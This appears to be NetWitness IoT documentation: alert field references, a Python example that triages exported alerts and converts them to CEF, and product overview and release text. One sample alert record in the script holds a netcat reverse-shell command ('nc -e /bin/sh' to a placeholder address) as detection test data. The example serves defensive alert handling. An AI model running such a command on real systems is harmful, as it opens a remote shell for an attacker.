id Unique id for the alert.
rule Name of the rule that was violated and is the reason for this alert. Currently one of ANOMALOUS_OUTBOUND_CONNECTION, KNOWN_RISKY_OUTBOUND_CONNECTION, ANOMALOUS_INBOUND_CONNECTION_CONTAINER, ANOMALOUS_INBOUND_CONNECTION_SITELOCAL, ANOMALOUS_INBOUND_CONNECTION_EXTERNAL, ANOMALOUS_NEW_CONNECTION_VOLUME, PCR, BLACKLISTED_PROCESS, ANOMALOUS_PROCESS, UNGRACEFUL_CONTAINER_SHUTDOWN.
severityScore Numeric score corresponding to the severity field, from 0 (EMERGENCY, most severe) to 7 (DEBUG, least severe).
recordCreated UTC timestamp at which this alert record was created.
created UTC timestamp at which the actual alert violation occurred on the offending container.
viewed Boolean value, which indicates whether this alert has been marked as Viewed by an analyst in NetWitness IoT. Note: the viewed flag is set by an analyst and is not calculated by NetWitness IoT.
falsePositive Boolean value, which indicates whether this alert has been marked as a false positive. Note: the falsePositive flag is set by an analyst and is not calculated by NetWitness IoT.

Extended field descriptions

Field Description
meta.container Contains attributes about the container for which the alert was generated.
meta.endpointCategory Contains attributes about the network source or destination related to this alert. This field is available only for the network-related alert rules (ANOMALOUS_OUTBOUND_CONNECTION, KNOWN_RISKY_OUTBOUND_CONNECTION, ANOMALOUS_INBOUND_CONNECTION_CONTAINER, ANOMALOUS_INBOUND_CONNECTION_SITELOCAL, ANOMALOUS_INBOUND_CONNECTION_EXTERNAL, ANOMALOUS_NEW_CONNECTION_VOLUME, PCR, UNGRACEFUL_CONTAINER_SHUTDOWN).
meta.processProfile Contains attributes about the process related to this alert. This field is available only for the process-related alert rules (BLACKLISTED_PROCESS, ANOMALOUS_PROCESS).
meta.events Contains a list of Docker events related to this alert. This field is available only for alerts of rule type UNGRACEFUL_CONTAINER_SHUTDOWN.
meta.actual For alerts based on numerical scores, the value that triggered the alert. Set for rule types KNOWN_RISKY_OUTBOUND_CONNECTION, ANOMALOUS_NEW_CONNECTION_VOLUME, and PCR.
meta.expected For alerts based on numerical scores, the expected (normal) value. Set for rule types KNOWN_RISKY_OUTBOUND_CONNECTION, ANOMALOUS_NEW_CONNECTION_VOLUME, and PCR.
meta.threshold For alerts based on numerical scores, the threshold value that meta.actual crossed to generate this alert. Set for rule types KNOWN_RISKY_OUTBOUND_CONNECTION, ANOMALOUS_NEW_CONNECTION_VOLUME, and PCR.

meta.container field descriptions

Field Description
meta.container.id Docker container id.
meta.container.hostname Name of the physical or virtual host on which the offending container is running.
meta.container.hostIp IP address of the physical or virtual host on which the offending container is running.
meta.container.hostId Id of the physical or virtual host on which the offending container is running. The id is unique within the NetWitness IoT cloud service. Always present.
meta.container.recordCreated UTC timestamp at which the container first became known to the NetWitness IoT cloud service. Always present.
meta.container.recordUpdated UTC timestamp at which this container record was last updated by the NetWitness IoT cloud service. Always present.
meta.container.name Docker container name.
meta.container.imageName Full Docker image name.
meta.container.created UTC timestamp at which the container was actually created on its Docker host.
meta.container.updated UTC timestamp of the last data generated by this container that was consumed by the NetWitness IoT cloud service. This value comes from the container, as opposed to meta.container.recordUpdated, which is generated by the NetWitness IoT cloud service.
meta.container.running Boolean value. Whether the container was last reported to be running at the time the alert was generated.
meta.container.command Primary command that the container was launched under.
meta.container.status Last reported Docker status of the container at the time the alert was generated.
meta.container.ports A list of network ports exposed by this container. This field is present only if the container exposes any ports. Each port entry contains the following attributes:
• meta.container.port.privatePort: Private port, accessible only to the container and to other containers on the same private network.
• meta.container.port.publicPort: Public port that maps to the private port. This is the port exposed to other services running on the Docker host or on the network.
• meta.container.port.type: Protocol accepted on this port (UDP or TCP).
meta.container.events If available, a list of recent Docker events reported against this container. Each Docker event contains the following fields:
• meta.container.event.containerId: Same as the meta.container.id value.
• meta.container.event.recordCreated: UTC timestamp at which this event record was created by the NetWitness IoT service.
• meta.container.event.created: UTC timestamp of the container event on the Docker host where the event took place.
• meta.container.event.action: The container event type that took place. One of: attach, create, destroy, detach, die, exec_create, exec_detach, exec_start, kill, oom, pause, rename, restart, start, stop, unpause, update.
meta.container.processProfiles List of all process types that normally run in this container. Generally present. Each process profile entry contains the following fields:
• firstSeen: UTC timestamp at which this process profile was first observed running in this container. Always present.
• lastSeen: UTC timestamp at which this process profile was last observed running in this container. Always present.
• id: Unique identifier of the process profile.
• pid: Process id that this process was last running under in this container. Always present.
• ppid: Last reported parent process id of this process in this container. Always present.
• executable: The process executable. Always present.
• cmd: Full process command (executable plus arguments). Always present.
• eUser: Last reported effective user name (or id) for this process. May not be present.
• rUser: Last reported real user name (or id) for this process. May not be present.
• sUser: Last reported saved user name (or id) for this process. May not be present.
• eGroup: Last reported effective group name (or id) for this process. May not be present.
• rGroup: Last reported real group name (or id) for this process. May not be present.
• sGroup: Last reported saved group name (or id) for this process. May not be present.
• tt: The terminal associated with this process, if applicable. May not be present.
• pcpu: Last reported % CPU for this process. May not be present.
• pmem: Last reported % memory for this process. May not be present.

meta.endpointCategory field descriptions

Field Description
id Category id. This represents an abstract grouping of similar traffic, based on attributes such as protocol, geo-location, port, destination IP, and so on.
isOutbound Boolean value. Set to true if this endpoint category is for a destination (that is, the container in meta.container initiated the connection). False if this endpoint category is for a source (that is, the endpoint initiated the connection into the container in meta.container).
firstSeen UTC timestamp at which an endpoint in this category was first observed communicating with the container in meta.container.
lastSeen UTC timestamp at which an endpoint in this category was last observed communicating with the container in meta.container.
protocol Protocol last used by any endpoint falling in this endpoint category. Generally one of udp, tcp, or icmp.
ipAddress IP address used by the last endpoint falling in this endpoint category.
dnsName DNS name of the last endpoint falling in this endpoint category. Only available for external endpoints (endpoints not on the local network). May not be present.
port Destination port used in communicating with the last endpoint falling in this endpoint category. If isOutbound is true, this is the destination port that the endpoint is listening on. If isOutbound is false, this is the destination port that the container in meta.container is listening on. Generally present, except for protocols that do not use ports, such as ICMP.
risk Risk description from Live Connect for the last endpoint falling in this endpoint category. May not be present.
riskScore Risk score from Live Connect for the last endpoint falling in this endpoint category. May not be present.
countryCode ISO two-letter country code of the last endpoint falling in this endpoint category. Only applicable for external IP addresses for which a geoIP location lookup was possible. May not be present.
country Country name of the last endpoint falling in this endpoint category. Only applicable for external IP addresses for which a geoIP location lookup was possible. May not be present.
continentCode Two-letter continent code of the last endpoint falling in this endpoint category. Only applicable for external IP addresses for which a geoIP location lookup was possible. May not be present.
continent Continent name of the last endpoint falling in this endpoint category. Only applicable for external IP addresses for which a geoIP location lookup was possible. May not be present.
subdivisionCode Subdivision code of the last endpoint falling in this endpoint category. A subdivision is a province, state, or other region within a country. Only applicable for external IP addresses for which a geoIP location lookup was possible. May not be present.
subdivision Subdivision name of the last endpoint falling in this endpoint category. A subdivision is a province, state, or other region within a country. Only applicable for external IP addresses for which a geoIP location lookup was possible. May not be present.
city City name of the last endpoint falling in this endpoint category. Only applicable for external IP addresses for which a geoIP location lookup was possible. May not be present.
latitude Latitude of the last endpoint falling in this endpoint category. Only applicable for external IP addresses for which a geoIP location lookup was possible. May not be present.
longitude Longitude of the last endpoint falling in this endpoint category. Only applicable for external IP addresses for which a geoIP location lookup was possible. May not be present.
isContainer Boolean value. True if the last endpoint falling in this endpoint category is a container running on the same host. False otherwise. Always present.
containerId Docker id of the container corresponding to the last endpoint falling in this endpoint category. Only present if isContainer is true.
containerName Docker name of the container corresponding to the last endpoint falling in this endpoint category. Only present if isContainer is true.
containerImage Docker image name of the container corresponding to the last endpoint falling in this endpoint category. Only present if isContainer is true.
isLocalhost Boolean value. True if the last endpoint falling in this endpoint category is a service running on the local host but is not a container. False otherwise. Always present.
isSiteLocal Boolean value. True if the last endpoint falling in this endpoint category is a remote endpoint on the local network. False otherwise. Always present.
isExternal Boolean value. True if the last endpoint falling in this endpoint category is a remote endpoint on the external (public) network. False otherwise. Always present.

meta.processProfile field descriptions

If present, this field contains a description of the specific process that triggered this alert. Refer to the description under meta.container.processProfiles.

meta.events field descriptions

If present, this field contains a subset of events in meta.container.events proximate to when this alert was triggered. Refer to the description under meta.container.events.
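The field layout above is what an analyst works with after toggling Raw Alert and copying the record. The following script is an added example, not NetWitness code: it loads exported alert records, drops the ones already marked viewed or falsePositive, builds a one-line summary from whichever extended fields the rule type carries (meta.endpointCategory for network rules, meta.processProfile for process rules, meta.events for UNGRACEFUL_CONTAINER_SHUTDOWN, plus meta.actual/expected/threshold for the scored rules), and renders an alert as a CEF line for a SIEM. It assumes the raw alert is a JSON object with the documented field names; the sample records, the CEF field mapping, and the syslog-to-CEF severity mapping are this example's own choices.

```python
import json
from datetime import datetime, timezone

# Rule families as given in the alert field descriptions above.
NETWORK_RULES = {
    "ANOMALOUS_OUTBOUND_CONNECTION", "KNOWN_RISKY_OUTBOUND_CONNECTION",
    "ANOMALOUS_INBOUND_CONNECTION_CONTAINER", "ANOMALOUS_INBOUND_CONNECTION_SITELOCAL",
    "ANOMALOUS_INBOUND_CONNECTION_EXTERNAL", "ANOMALOUS_NEW_CONNECTION_VOLUME", "PCR",
}
PROCESS_RULES = {"BLACKLISTED_PROCESS", "ANOMALOUS_PROCESS"}
SCORED_RULES = {"KNOWN_RISKY_OUTBOUND_CONNECTION", "ANOMALOUS_NEW_CONNECTION_VOLUME", "PCR"}
# severityScore is syslog-style: 0 (EMERGENCY) is most severe, 7 (DEBUG) least.
SEVERITY_NAMES = ["EMERGENCY", "ALERT", "CRITICAL", "ERROR", "WARNING", "NOTICE", "INFO", "DEBUG"]

# Constructed sample export (assumption: a JSON array of alert objects using the
# documented field names). The address is from the 203.0.113.0/24 documentation range.
RAW_ALERTS = json.dumps([
    {"id": "a-1001", "rule": "KNOWN_RISKY_OUTBOUND_CONNECTION", "severityScore": 2,
     "created": "2021-03-01T10:15:00Z", "viewed": False, "falsePositive": False,
     "meta": {"container": {"id": "c0ffee01", "name": "edge-gw", "hostname": "gw-01"},
              "endpointCategory": {"isOutbound": True, "protocol": "tcp", "port": 443,
                                   "ipAddress": "203.0.113.25", "dnsName": "cdn.example.net",
                                   "riskScore": 88, "risk": "known C2", "isContainer": False,
                                   "isLocalhost": False, "isSiteLocal": False, "isExternal": True},
              "actual": 88, "expected": 10, "threshold": 70}},
    {"id": "a-1002", "rule": "BLACKLISTED_PROCESS", "severityScore": 1,
     "created": "2021-03-01T10:16:00Z", "viewed": False, "falsePositive": False,
     "meta": {"container": {"id": "c0ffee01", "name": "edge-gw", "hostname": "gw-01"},
              "processProfile": {"executable": "/usr/bin/nc", "eUser": "root",
                                 "cmd": "nc -e /bin/sh 203.0.113.25 4444"}}},
    {"id": "a-1003", "rule": "ANOMALOUS_PROCESS", "severityScore": 4,  # already triaged
     "created": "2021-03-01T10:17:00Z", "viewed": True, "falsePositive": True,
     "meta": {"container": {"id": "c0ffee02", "name": "sensor-agg", "hostname": "gw-01"},
              "processProfile": {"executable": "/usr/sbin/logrotate", "cmd": "logrotate -f"}}},
    {"id": "a-1004", "rule": "UNGRACEFUL_CONTAINER_SHUTDOWN", "severityScore": 3,
     "created": "2021-03-01T10:18:00Z", "viewed": False, "falsePositive": False,
     "meta": {"container": {"id": "c0ffee02", "name": "sensor-agg", "hostname": "gw-01"},
              "events": [{"action": "oom"}, {"action": "die"}]}},
])

def load_alerts(raw_json):
    data = json.loads(raw_json)          # accept a single object or an array
    return data if isinstance(data, list) else [data]

def severity_name(score):
    return SEVERITY_NAMES[score] if isinstance(score, int) and 0 <= score <= 7 else "UNKNOWN"

def endpoint_zone(cat):
    # The four location flags are mutually exclusive; collapse them into one label.
    for flag, zone in (("isContainer", "container"), ("isLocalhost", "localhost"),
                       ("isSiteLocal", "site-local"), ("isExternal", "external")):
        if cat.get(flag):
            return zone
    return "unknown"

def describe(alert):
    """One-line analyst summary built from the extended fields the rule type carries."""
    meta, rule = alert.get("meta", {}), alert["rule"]
    if rule in NETWORK_RULES and "endpointCategory" in meta:
        cat = meta["endpointCategory"]
        direction = "to" if cat.get("isOutbound") else "from"
        target = cat.get("dnsName") or cat.get("ipAddress", "?")
        text = f"{direction} {endpoint_zone(cat)} {target} {cat.get('protocol', '?')}/{cat.get('port', '-')}"
        if "riskScore" in cat:  # Live Connect enrichment is optional
            text += f" (Live Connect risk {cat['riskScore']}: {cat.get('risk', '')})"
    elif rule in PROCESS_RULES and "processProfile" in meta:
        prof = meta["processProfile"]
        text = f"{prof.get('cmd') or prof.get('executable')} as {prof.get('eUser', '?')}"
    elif rule == "UNGRACEFUL_CONTAINER_SHUTDOWN" and "events" in meta:
        text = "docker events: " + ",".join(e.get("action", "?") for e in meta["events"])
    else:
        text = "no extended fields"
    if rule in SCORED_RULES and "actual" in meta:
        text += f"; actual={meta['actual']} expected={meta.get('expected')} threshold={meta.get('threshold')}"
    return text

def triage(raw_json):
    """Drop alerts already handled (viewed or false positive); most severe first."""
    todo = [a for a in load_alerts(raw_json) if not a.get("viewed") and not a.get("falsePositive")]
    todo.sort(key=lambda a: a.get("severityScore", 7))
    return [{"id": a["id"], "rule": a["rule"], "severity": severity_name(a.get("severityScore")),
             "container": a.get("meta", {}).get("container", {}).get("name"),
             "summary": describe(a)} for a in todo]

def _cef_escape(value, specials):
    out = str(value).replace("\\", "\\\\")       # backslash first, then the delimiters
    for ch in specials:
        out = out.replace(ch, "\\" + ch)
    return out.replace("\n", "\\n")

def to_cef(alert):
    """Render one alert as a CEF line (the field mapping here is this example's choice)."""
    score = alert.get("severityScore", 7)
    cef_sev = 10 - score if isinstance(score, int) and 0 <= score <= 7 else 3  # CEF: 10 = highest
    created = datetime.strptime(alert["created"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    cont = alert.get("meta", {}).get("container", {})
    ext = {"externalId": alert["id"], "rt": int(created.timestamp() * 1000),
           "shost": cont.get("hostname", ""), "cs1Label": "container", "cs1": cont.get("name", ""),
           "msg": describe(alert)}
    rule = _cef_escape(alert["rule"], "|")
    return (f"CEF:0|NetWitness|NetWitness IoT|1|{rule}|{rule}|{cef_sev}|"
            + " ".join(f"{k}={_cef_escape(v, '=')}" for k, v in ext.items()))
```

Running triage(RAW_ALERTS) on the constructed records returns three rows (the false positive is dropped) ordered a-1002, a-1001, a-1004, that is ALERT before CRITICAL before ERROR; to_cef(load_alerts(RAW_ALERTS)[0]) produces a line whose msg carries the actual/expected/threshold values with the equals signs escaped, as CEF requires.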

4 - How NetWitness IoT Protects

Secure your IoT infrastructure

Overview

NetWitness IoT provides complete visibility into your connected IoT environment. NetWitness IoT enables organizations to extend their Security Operation Center (SOC) visibility beyond IT and into IoT and OT (Operational Technology). NetWitness IoT provides the ability to monitor and detect threats end-to-end. For example, an attack initiated from the IT systems and laterally moved to the OT systems can be easily detected. The analysts can get visibility into the complete spectrum of attacks on the entire environment. NetWitness IoT is part of NetWitness portfolio and seamlessly integrates with NetWitness Platform for extending SOC visibility into IoT/OT.

How It Works

NetWitness IoT detects threats and anomalies in your IoT infrastructure and provides the following additional capabilities:

  • Visibility across edge and IoT devices. Billions of IoT devices are deployed every year, including sensors, robots, cameras, meters and more. NetWitness IoT provides visibility into this important and growing infrastructure.
  • Use of latest technology along with advanced threat intelligence to quickly identify when IoT devices are compromised or detect any anomalous behavior.
  • Rich visualization and reporting capabilities enable everyone from operations managers to security analysts to efficiently investigate anomalous activity. Full meta and drill-down capabilities help you focus on risks, not noise.
  • Integration with multiple IoT platforms. IoT devices and protocols are known for their complex behavior. NetWitness IoT integrates with leading IoT management platforms and SIEMs using standard mechanisms (JSON, CEF). This capability helps you easily add advanced security to existing deployments. In addition to NetWitness Platform, you can also integrate with other security tools using standard protocols.

IoT Edge Ecosystem Partners

NetWitness IoT is part of a growing ecosystem of Edge IoT leaders. These RSA Ready certified products and partners help organizations around the globe analyze, plan, design, manage, and operate IoT systems of every size and type. NetWitness IoT provides a layer of RSA-quality security monitoring, to protect these critical assets and enable valuable innovation.

For partner details and contact information, please visit the RSA Ready site and select NetWitness IoT.

5 - Release Information

Provides release information and describes new enhancements.

Release Information: Introduction to NetWitness IoT

NetWitness, an RSA business (@RSAsecurity), a globally trusted partner for some of the world's largest and most security-sensitive organizations, introduces NetWitness IoT, a SaaS-native solution that delivers visibility across an organization's critical infrastructure, including its Internet of Things (IoT) and operational technology (OT) systems. NetWitness IoT provides enterprises with security monitoring for disparate IoT and OT devices at scale, by monitoring gateways, servers, and the attached devices for behavioral anomalies to produce focused and actionable alerts.

Visibility across edge and IoT devices

There are billions of IoT devices deployed by enterprises, including sensors, robots, cameras, meters and more. NetWitness IoT provides visibility into this important and growing component of your infrastructure.

NetWitness IoT detects threats to IoT and edge devices using advanced behavior analytics. The cloud service identifies anomalies and indicators of compromise and presents alerts in a modern user interface with rich data and response tools.

Extending SOC visibility

NetWitness IoT seamlessly integrates with NetWitness Platform and provides a unified view for security staff to monitor the IT and IoT environments. Additionally, NetWitness IoT integrates with leading IT security monitoring tools from other vendors so you can more easily extend existing security operation deployments.

Machine learning and behavioral alerting

The wide range of complex functions performed by IoT devices makes it hard for security teams to spot anomalous behavior. NetWitness IoT applies advanced machine learning and behavior analytics, to quickly identify instances where devices could be compromised.

Dashboard and investigations

Rich visualization and reporting capabilities enable everyone from operations managers to security analysts to efficiently investigate anomalous activity. Full meta and drill-down capabilities help you focus on risks, not noise.

Integration with multiple IoT platforms

IoT devices and protocols are famously complex. NetWitness IoT integrates with leading IoT management platforms from other vendors so you can more easily add advanced security to existing deployments.

IoT Edge Ecosystem Partners

NetWitness IoT is part of a growing ecosystem of Edge IoT leaders. These RSA Ready certified products and partners help organizations around the globe analyze, plan, design, manage, and operate IoT systems of every size and type. NetWitness IoT provides a layer of RSA-quality security monitoring, to protect these critical assets and enable valuable innovation.